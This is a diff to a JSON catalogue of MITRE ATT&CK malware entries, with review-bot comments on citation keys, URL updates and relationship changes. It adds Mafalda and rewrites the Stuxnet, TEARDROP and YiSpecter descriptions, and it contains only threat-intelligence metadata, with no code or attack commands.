"value": "Hildegard - S0601"
},
+ {
+ "description": "[Mafalda](https://attack.mitre.org/software/S1060) is a flexible interactive implant that has been used by [Metador](https://attack.mitre.org/groups/G1013). Security researchers assess the [Mafalda](https://attack.mitre.org/software/S1060) name may be inspired by an Argentinian cartoon character that has been popular as a means of political commentary since the 1960s. (Citation: SentinelLabs Metador Sept 2022)",
+ "meta": {
+ "external_id": "S1060",
+ "mitre_platforms": [
+ "Windows"
+ ],
+ "refs": [
+ "https://assets.sentinelone.com/sentinellabs22/metador#page=1",
+ "https://attack.mitre.org/software/S1060"
+ ],
+ "synonyms": [
+ "Mafalda"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "04fd5427-79c7-44ea-ae13-11b24778ff1c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "1c34f7aa-9341-4a48-bfab-af22e51aca6c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "24bfaeba-cb0d-4525-b3dc-507c77ecec41",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "5e4a2073-9643-44cb-a0b5-e7f4048446c7",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "60b508a1-6a5e-46b1-821a-9f7b78752abf",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "6495ae23-3ab4-43c5-a94f-5638a2c31fd2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "8868cb5b-d575-4a60-acb2-07d37389a2fd",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "8cdeb020-e31e-4f88-a582-f53dcfbda819",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "cba37adb-d6fb-4610-b069-dd04c0643384",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e4dc8c01-417f-458d-9ee0-bb0617c1b391",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f6dacc85-b37d-458e-b58d-74fc4bbf5755",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "3be1fb7a-0f7e-415e-8e3a-74a80d596e68",
+ "value": "Mafalda - S1060"
+ },
{
"description": "[SideTwist](https://attack.mitre.org/software/S0610) is a C-based backdoor that has been used by [OilRig](https://attack.mitre.org/groups/G0049) since at least 2021.(Citation: Check Point APT34 April 2021)",
"meta": {
@@ -12092,13 +12858,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "b8eb28e4-48a6-40ae-951a-328714f75eda",
@@ -12596,7 +13355,7 @@
],
"refs": [
"https://attack.mitre.org/software/S0180",
- "https://www.symantec.com/security-center/writeup/2014-081811-3237-99?tabid=2",
+ "https://web.archive.org/web/20181126143456/https://www.symantec.com/security-center/writeup/2014-081811-3237-99?tabid=2",
"https://www.us-cert.gov/ncas/alerts/TA17-318B",
"https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-D_WHITE_S508C.PDF"
],
@@ -12605,6 +13364,13 @@
]
},
"related": [
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "0a52e73b-d7e9-45ae-9bda-46568f753931",
"tags": [
@@ -12724,13 +13490,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
"tags": [
@@ -12751,13 +13510,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "495b6cdb-7b5a-4fbc-8d33-e7ef68806d08",
@@ -13054,13 +13806,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "4c59cce8-cb48-4141-b9f1-f646edfaadb0",
@@ -13116,13 +13861,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "5bcd5511-6756-4824-a692-e8bb109364af",
@@ -13222,7 +13960,7 @@
"refs": [
"http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf",
"https://attack.mitre.org/software/S0023",
- "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf",
+ "https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf",
"https://www.justice.gov/file/1080281/download",
"https://www.symantec.com/blogs/election-security/apt28-espionage-military-government",
"https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf"
@@ -13244,6 +13982,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "09a60ea3-a8d1-4ae5-976e-5783248b72a4",
"tags": [
@@ -13445,11 +14190,11 @@
"Windows"
],
"refs": [
- "http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf",
"https://attack.mitre.org/software/S0203",
"https://community.softwaregrp.com/t5/Security-Research/9002-RAT-a-second-building-on-the-left/ba-p/228686#.WosBVKjwZPZ",
"https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/",
"https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf",
+ "https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf",
"https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf",
"https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html",
"https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html",
@@ -14825,13 +15570,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "48523614-309e-43bf-a2b8-705c2b45d7b2",
@@ -15579,13 +16317,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "47afe41c-4c08-485e-b062-c3bd209a1cce",
@@ -15817,13 +16548,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab",
"tags": [
@@ -15853,14 +16577,14 @@
"type": "uses"
},
{
- "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
},
{
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
+ "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
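Review bot: this hunk reads as two relationships being re-pointed (e6919abc... to d511a6f6..., f72eb8a8... to e6919abc...), but because `related` is kept sorted by dest-uuid the net change is one insertion (d511a6f6-4a33-41d5-bc95-c343875d1377) and one removal (f72eb8a8-cd4c-461d-a814-3f862befbf00), the same pair seen elsewhere in this patch. Worth a line in the commit message so reviewers do not read it as a changed target; the same applies to the hunks at 19275 and 28383.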
@@ -16520,13 +17244,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "53cf6cc4-65aa-445a-bcf8-c3d296f8a7a2",
@@ -17536,7 +18253,7 @@
"value": "Nebulae - S0630"
},
{
- "description": "[Stuxnet](https://attack.mitre.org/software/S0603) was the first publicly reported piece of malware to specifically target industrial control systems devices. [Stuxnet](https://attack.mitre.org/software/S0603) is a large and complex piece of malware that utilized multiple different behaviors including multiple zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: CISA ICS Advisory ICSA-10-272-01)(Citation: ESET Stuxnet Under the Microscope)(Citation: Langer Stuxnet) [Stuxnet](https://attack.mitre.org/software/S0603) was discovered in 2010, with some components being used as early as November 2008.(Citation: Symantec W.32 Stuxnet Dossier)",
+ "description": "[Stuxnet](https://attack.mitre.org/software/S0603) was the first publicly reported piece of malware to specifically target industrial control systems devices. [Stuxnet](https://attack.mitre.org/software/S0603) is a large and complex piece of malware that utilized multiple different behaviors including multiple zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)(Citation: CISA ICS Advisory ICSA-10-272-01)(Citation: ESET Stuxnet Under the Microscope)(Citation: Langer Stuxnet) [Stuxnet](https://attack.mitre.org/software/S0603) was discovered in 2010, with some components being used as early as November 2008.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) ",
"meta": {
"external_id": "S0603",
"mitre_platforms": [
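Review bot: the new description string ends with a trailing space before the closing quote (`...February 2011) ",`), which should be trimmed. The citation key also changes from a short source label (`Symantec W.32 Stuxnet Dossier`) to an author list with a date (`Nicolas Falliere, Liam O Murchu, Eric Chien February 2011`), a style the neighbouring keys in the same string (`CISA ICS Advisory ICSA-10-272-01`, `ESET Stuxnet Under the Microscope`, `Langer Stuxnet`) do not use; if this comes straight from upstream it is fine, otherwise keep the label style consistent.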
@@ -17547,7 +18264,7 @@
"https://us-cert.cisa.gov/ics/advisories/ICSA-10-272-01",
"https://www.esetnod32.ru/company/viruslab/analytics/doc/Stuxnet_Under_the_Microscope.pdf",
"https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf",
- "https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf"
+ "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf"
],
"synonyms": [
"Stuxnet",
@@ -18322,13 +19039,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "68dca94f-c11d-421e-9287-7c501108e18c",
@@ -18468,13 +19178,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "0db09158-6e48-4e7c-8ce7-2b10b9c0c039",
@@ -18572,14 +19275,14 @@
"type": "uses"
},
{
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
},
{
- "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -18855,7 +19558,7 @@
"type": "uses"
},
{
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
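Review bot: here, and in the hunks at 19275, 21689/21703 and 28383, dest-uuid b3d682b6-98f2-4fb0-aa3b-b4df007ca70a is dropped while d511a6f6-4a33-41d5-bc95-c343875d1377 is added, which looks like a one-for-one replacement, yet the new KEYPLUG (S1051) and DEADEYE (S1052) entries in this same patch still reference b3d682b6-98f2-4fb0-aa3b-b4df007ca70a. Please confirm both uuids remain valid clusters and say in the commit message that this is a per-entry relationship change, not a uuid rename.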
@@ -20986,13 +21689,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "bf176076-b789-408e-8cba-7275e81c0ada",
"tags": [
@@ -21007,6 +21703,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -21248,7 +21951,7 @@
"value": "RARSTONE - S0055"
},
{
- "description": "[TEARDROP](https://attack.mitre.org/software/S0560) is a memory-only dropper that was discovered on some victim machines during investigations related to the 2020 SolarWinds cyber intrusion. It was likely used by [APT29](https://attack.mitre.org/groups/G0016) since at least May 2020.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Deep Dive Solorigate January 2021)",
+ "description": "[TEARDROP](https://attack.mitre.org/software/S0560) is a memory-only dropper that was discovered on some victim machines during investigations related to the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024). It was likely used by [APT29](https://attack.mitre.org/groups/G0016) since at least May 2020.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Deep Dive Solorigate January 2021)",
"meta": {
"external_id": "S0560",
"mitre_platforms": [
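Review bot: replacing "the 2020 SolarWinds cyber intrusion" with the campaign link drops the year from the description, so a reader of the rendered galaxy no longer sees when the intrusion happened without following the link; consider keeping the year in the sentence alongside the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024) reference.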
@@ -21529,6 +22232,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
"tags": [
@@ -21599,6 +22309,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "208884f1-7b83-4473-ac22-4e1cf6c41471",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e",
"tags": [
@@ -21613,6 +22330,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "29be378d-262d-4e99-b00d-852d573628e6",
"tags": [
@@ -21697,13 +22421,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
"tags": [
@@ -21795,6 +22512,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "7e7c2fba-7cca-486c-9582-4c1bb2851961",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
"tags": [
@@ -21900,6 +22624,20 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d4dc46e3-5ba5-45b9-8204-010867cacfcb",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -21942,6 +22680,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
"tags": [
@@ -21949,6 +22694,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "ec8fc7e2-b356-455c-8db5-2e37be158e7d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "ef67e13e-5598-4adc-bdb2-998225874fa9",
"tags": [
@@ -23681,43 +24433,7 @@
"TRISIS"
]
},
- "related": [
- {
- "dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "cc3502b5-30cc-4473-ad48-42d51a6ef6d1",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- }
- ],
+ "related": [],
"uuid": "93ae2edf-a598-4d2d-acd7-bcae0c021923",
"value": "TRITON - S0609"
},
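Review bot: all five relationships of the TRITON (S0609) entry are removed and `related` becomes an empty array, which is a larger change than the single-relationship edits elsewhere in this patch. Please confirm this is what the upstream data now says (for example, that these technique objects are no longer part of the dataset this file is generated from) rather than a generator issue, and note the reason in the commit message.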
@@ -23848,13 +24564,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "5e4a2073-9643-44cb-a0b5-e7f4048446c7",
"tags": [
@@ -23883,13 +24592,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
"tags": [
@@ -24508,6 +25210,9 @@
"refs": [
"https://attack.mitre.org/software/S1012",
"https://www.cybereason.com/blog/research/powerless-trojan-iranian-apt-phosphorus-adds-new-powershell-backdoor-for-espionage"
+ ],
+ "synonyms": [
+ "PowerLess"
]
},
"related": [
@@ -25052,15 +25757,107 @@
"value": "Prikormka - S0113"
},
{
- "description": "[YiSpecter](https://attack.mitre.org/software/S0311) iOS malware that affects both jailbroken and non-jailbroken iOS devices. It is also unique because it abuses private APIs in the iOS system to implement functionality. (Citation: PaloAlto-YiSpecter)",
+ "description": "[YiSpecter](https://attack.mitre.org/software/S0311) is a family of iOS and Android malware, first detected in November 2014, targeting users in mainland China and Taiwan. [YiSpecter](https://attack.mitre.org/software/S0311) abuses private APIs in iOS to infect both jailbroken and non-jailbroken devices.(Citation: paloalto_yispecter_1015)",
"meta": {
"external_id": "S0311",
+ "mitre_platforms": [
+ "Android",
+ "iOS"
+ ],
"refs": [
"https://attack.mitre.org/software/S0311",
- "https://researchcenter.paloaltonetworks.com/2015/10/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/"
+ "https://unit42.paloaltonetworks.com/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/"
+ ],
+ "synonyms": [
+ "YiSpecter"
]
},
- "related": [],
+ "related": [
+ {
+ "dest-uuid": "198ce408-1470-45ee-b47f-7056050d4fc2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "1b51f5bc-b97a-498a-8dbd-bc6b1901bf19",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2282a98b-5049-4f61-9381-55baca7c1add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "670a4d75-103b-4b14-8a9e-4652fa795edd",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "6c49d50f-494d-4150-b774-a655022d20a6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "702055ac-4e54-4ae9-9527-e23a38e0b160",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d3bc5020-f6a2-41c0-8ccb-5e563101b60c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d4536441-1bcc-49fa-80ae-a596ed3f7ffd",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e2ea7f6b-8d4f-49c3-819d-660530d12b77",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f05fc151-aa62-47e3-ae57-2d1b23d64bf6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "fcb11f06-ce0e-490b-bcc1-04a1623579f0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "fd339382-bfec-4bf0-8d47-1caedc9e7e57",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
"uuid": "a15c9357-2be0-4836-beec-594f28b9b4a9",
"value": "YiSpecter - S0311"
},
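Review bot: the citation key for YiSpecter changes from `PaloAlto-YiSpecter` to `paloalto_yispecter_1015`, a lowercase, underscore-separated style that differs from the `Vendor Title Date` keys used by most entries in this file (compare `Mandiant APT41` and `ClearSky Siamesekitten August 2021` in the same patch); if the key is taken verbatim from upstream this is fine, otherwise normalise it. The refs URL move from researchcenter.paloaltonetworks.com to unit42.paloaltonetworks.com and the added `Android` platform are consistent with the rewritten description.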
